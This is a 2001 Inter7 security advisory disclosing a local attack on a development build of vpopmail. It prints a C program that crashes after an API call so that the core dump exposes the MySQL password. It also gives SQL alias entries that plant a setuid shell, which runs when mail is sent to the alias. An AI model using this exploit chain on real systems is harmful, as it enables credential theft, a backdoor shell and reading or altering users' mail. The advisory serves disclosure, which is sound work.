www.inter7.com
Inter7 Internet Technologies, Inc.
Internal Advisory
------------------------------------------
Date 08/09/2001
Category Security
Item vpopmail [DEVELOPMENT]
Severity Medium
Distribution Public
Status: Package is development; stable release to be patched
Summary:
A dump of memory proceeding a vpopmail API call leads to
full database permissions which can lead to a root compromise.
While there are other variants of this attack, this document
only covers one aspect of it with MySQL.
Full description:
A local attacker without root priveleges running the following
code may be able to read the database password vpopmail was compiled
with. The following attack only works if valias has been enabled.
#include <stdio.h>
#include <sys/types.h>
#include "vauth.h"
int main(int argc, char *argv[])
{
char *p = NULL;
struct vqpasswd *pw = NULL;
pw = vauth_getall("domain.com", 1, 0);
if (!pw) {
printf("Failed.\n");
return 1;
}
printf("Dumping.\n");
*p = 'x';
/*
Shouldn't get here.
*/
return 0;
}
This program with the proper settings should lead to a core dump
of the process in memory, which can be used to deduce the password
stored for the database.
After access to the database has been gained, the following MySQL
commands, which sets up an alias of test to create a SUID/SGID shell
owned by the vpopmail:vchkpw user.
INSERT INTO valias values ('test', 'domain.com',
'|/bin/chmod ug+rxs,o+rx /home/vpopmail/vsh');
INSERT INTO valias values ('test', 'domain.com',
'|/bin/cp /bin/sh /home/vpopmail/vsh');
Lastly, all the attacker must do is send mail to [EMAIL PROTECTED]
wherein the shell will be created to be executed later.
As the vpopmail user the attacker can read and modify all email
running through the system, and has the ability to update vpopmail
binaries/libraries to contain trojan attacks which can lead to
a root compromise.
--
[EMAIL PROTECTED]
Inter7 Internet Technologies, Inc. - www.inter7.com
